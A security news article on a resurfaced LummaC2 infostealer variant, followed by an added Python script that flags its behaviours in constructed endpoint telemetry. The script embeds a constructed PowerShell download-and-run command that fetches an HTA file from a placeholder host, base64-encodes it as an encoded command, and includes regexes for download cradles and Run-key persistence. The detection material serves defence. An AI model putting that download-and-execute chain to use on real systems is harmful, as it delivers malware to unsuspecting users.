LummaC2 Infostealer Resurfaces With Obfuscated PowerShell Tactics

Summary: LummaC2, an infostealer malware, has re-emerged with advanced tactics to infiltrate systems and exfiltrate sensitive data using obfuscated PowerShell commands. This malware, initially identified in 2022, poses significant risks through its sophisticated methods and reliance on legitimate Windows binaries for execution.

Threat Actor: LummaC2 Operators
Victim: Various Organizations

Key Points:

  • Stages of infection involve encoded PowerShell commands that download and execute additional malicious scripts, often disguised as legitimate files.
  • LummaC2 utilizes LOLbins like Mshta.exe for stealthy initial payload execution, leveraging trusted Windows binaries.
  • The malware ensures persistence by modifying registry locations, allowing it to start automatically with the system.
  • Communication with the command-and-control server is conducted via POST requests, using dllhost.exe to exfiltrate data and receive instructions.

LummaC2, an infostealer that abuses obfuscated PowerShell commands, has resurfaced to infiltrate systems and exfiltrate sensitive data.

Discovered by cybersecurity researchers at Ontinue, the malware’s latest variant demonstrates sophisticated tactics that pose significant risks to targeted systems.

LummaC2, initially identified on Russian-speaking forums in 2022, is a tool written in C and distributed as Malware-as-a-Service (MaaS). It is designed to steal sensitive information from infected endpoints, including credentials and personal data.

The new report, published today, details how LummaC2’s initial attack vector involves obfuscated PowerShell commands that download and execute payloads, often using Microsoft’s legitimate LOLbins (Living-off-the-Land binaries) such as Mshta.exe and Dllhost.exe for malicious purposes.

New LummaC2 Variant: Key Findings

  • Stages of infection: The malware operates in multiple stages, starting with an encoded PowerShell command that downloads additional malicious scripts and files. These scripts are then decrypted and executed on the target device, often masquerading as legitimate files to evade detection.

  • Use of LOLbins: LummaC2 leverages Mshta.exe to run HTML application files for its initial payload execution. This allows the malware to remain stealthy by utilizing trusted Windows binaries.

  • Persistence techniques: The malware achieves persistence by writing to common registry locations that ensure it starts automatically with the system, allowing continuous access to compromised devices.

  • Command-and-control (C2): The malware communicates with its C2 server via POST requests, exfiltrating stolen data and receiving instructions. The process “dllhost.exe” is exploited for this communication, allowing attackers to manipulate the compromised system remotely.


The implications of these findings are concerning. As Ontinue’s analysis shows, LummaC2’s techniques map to MITRE ATT&CK techniques such as Process Injection (T1055) and Persistence via Registry Modification (T1547.001).

The firm emphasized the need for enhanced endpoint monitoring and implementation of security measures like attack surface reduction (ASR) rules to counteract these sophisticated threats.

Organizations are also advised to deploy endpoint detection and response (EDR) solutions and monitor unusual behavior, particularly those involving trusted processes like dllhost.exe.
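The following is an added example, not code from the Ontinue report or from this article, showing how the behaviours in the findings list above (encoded PowerShell stage, Mshta.exe HTA execution, Run-key persistence, dllhost.exe POST traffic) and the monitoring advice can be expressed as triage logic over endpoint telemetry. Every event, hostname, path and the decoded command is constructed; the ATT&CK IDs are real technique identifiers, while treating a dllhost.exe instance with a parent other than svchost.exe as a T1055 indicator is a heuristic assumption of this example, not a claim from the report.

```python
"""Triage constructed endpoint events for the LummaC2 behaviours described in
the report. Added example; events, hosts and paths below are constructed."""
import base64
import re
from collections import Counter
from dataclasses import dataclass

# Constructed decoded stage-1 command: a generic download-and-run chain that
# hands an HTA file to mshta.exe. The host is a placeholder, not an indicator.
STAGE1_PLAINTEXT = (
    "$u='http://stage.example.invalid/update.hta';"
    "Invoke-WebRequest $u -OutFile $env:TEMP\\update.hta;"
    "Start-Process mshta.exe $env:TEMP\\update.hta"
)
# PowerShell -EncodedCommand expects base64 over UTF-16LE text.
STAGE1_ENCODED = base64.b64encode(STAGE1_PLAINTEXT.encode("utf-16-le")).decode()

# Constructed Sysmon-like events (process, registry, network), plus benign noise.
SAMPLE_EVENTS = [
    {"type": "process", "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "parent": r"C:\Windows\explorer.exe",
     "cmdline": f"powershell.exe -nop -w hidden -enc {STAGE1_ENCODED}"},
    {"type": "process", "image": r"C:\Windows\System32\mshta.exe",
     "parent": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": r"mshta.exe C:\Users\user\AppData\Local\Temp\update.hta"},
    {"type": "registry", "image": r"C:\Windows\System32\mshta.exe",
     "key": r"HKCU\Software\Microsoft\Windows\CurrentVersion\Run\Updater",
     "value": r"C:\Users\user\AppData\Roaming\updater.exe"},
    {"type": "process", "image": r"C:\Windows\System32\dllhost.exe",
     "parent": r"C:\Users\user\AppData\Roaming\updater.exe", "cmdline": "dllhost.exe"},
    {"type": "network", "image": r"C:\Windows\System32\dllhost.exe",
     "method": "POST", "dest": "c2.example.invalid:443"},
    # Benign: COM surrogate started by svchost.exe (placeholder CLSID), and a
    # plain interactive PowerShell command. Neither should produce a finding.
    {"type": "process", "image": r"C:\Windows\System32\dllhost.exe",
     "parent": r"C:\Windows\System32\svchost.exe",
     "cmdline": "dllhost.exe /Processid:{00000000-0000-0000-0000-000000000000}"},
    {"type": "process", "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "parent": r"C:\Windows\System32\cmd.exe", "cmdline": "powershell.exe -Command Get-Date"},
]

# -e / -ec / -en / -enc / -EncodedCommand followed by a base64 blob.
ENC_RE = re.compile(r"(?i)(?:^|\s)-(?:e|ec|en|enc|encodedcommand)\s+([A-Za-z0-9+/=]{16,})")
CRADLE_RE = re.compile(r"(?i)downloadstring|downloadfile|invoke-webrequest|\biwr\b|https?://")
RUN_KEY_RE = re.compile(r"(?i)\\CurrentVersion\\(?:Run|RunOnce)(?:\\|$)")
TRUSTED_DIRS = (r"c:\windows\system32", r"c:\program files")


@dataclass(frozen=True)
class Finding:
    stage: str
    technique: str   # MITRE ATT&CK technique ID
    image: str
    detail: str


def basename(path: str) -> str:
    return path.rsplit("\\", 1)[-1].lower()


def decode_encoded_powershell(cmdline: str):
    """Return the decoded -EncodedCommand text, or None if absent/undecodable."""
    m = ENC_RE.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def triage_event(ev: dict) -> list:
    findings, img = [], basename(ev["image"])
    if ev["type"] == "process":
        cmd = ev.get("cmdline", "")
        if img == "powershell.exe":
            decoded = decode_encoded_powershell(cmd)
            if decoded is not None:
                findings.append(Finding("stage 1: encoded PowerShell", "T1027", img, decoded[:80]))
                if CRADLE_RE.search(decoded):
                    findings.append(Finding("stage 1: download-and-execute", "T1059.001", img, decoded[:80]))
        elif img == "mshta.exe" and re.search(r"(?i)https?://|\.hta\b", cmd):
            findings.append(Finding("stage 2: HTA via mshta.exe", "T1218.005", img, cmd))
        elif img == "dllhost.exe" and basename(ev.get("parent", "")) != "svchost.exe":
            # Heuristic (this example's assumption): COM surrogates are normally
            # spawned by svchost.exe; another parent suggests a hijacked host process.
            findings.append(Finding("C2 host with unexpected parent", "T1055", img, ev["parent"]))
    elif ev["type"] == "registry" and RUN_KEY_RE.search(ev["key"]):
        if not ev["value"].lower().startswith(TRUSTED_DIRS):
            findings.append(Finding("persistence: Run key", "T1547.001", img, ev["key"]))
    elif ev["type"] == "network" and img == "dllhost.exe" and ev.get("method") == "POST":
        findings.append(Finding("C2: POST from dllhost.exe", "T1071.001", img, ev["dest"]))
    return findings


def triage(events: list) -> list:
    return [f for ev in events for f in triage_event(ev)]


def summarize(findings: list) -> dict:
    """Count findings per ATT&CK technique for a quick coverage view."""
    return dict(Counter(f.technique for f in findings))


if __name__ == "__main__":
    for f in triage(SAMPLE_EVENTS):
        print(f"{f.technique:10} {f.stage:34} {f.image}: {f.detail}")
    print(summarize(triage(SAMPLE_EVENTS)))
```

The value of decoding the encoded command rather than alerting on `-enc` alone is that it lets the rule distinguish a download cradle from the encoded commands legitimate tooling emits, which is where most false positives in this class of detection come from; the benign svchost.exe-parented dllhost.exe event shows why the parent check matters for a binary that is normally trusted.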

Source: https://www.infosecurity-magazine.com/news/lummac2-infostealer-obfuscated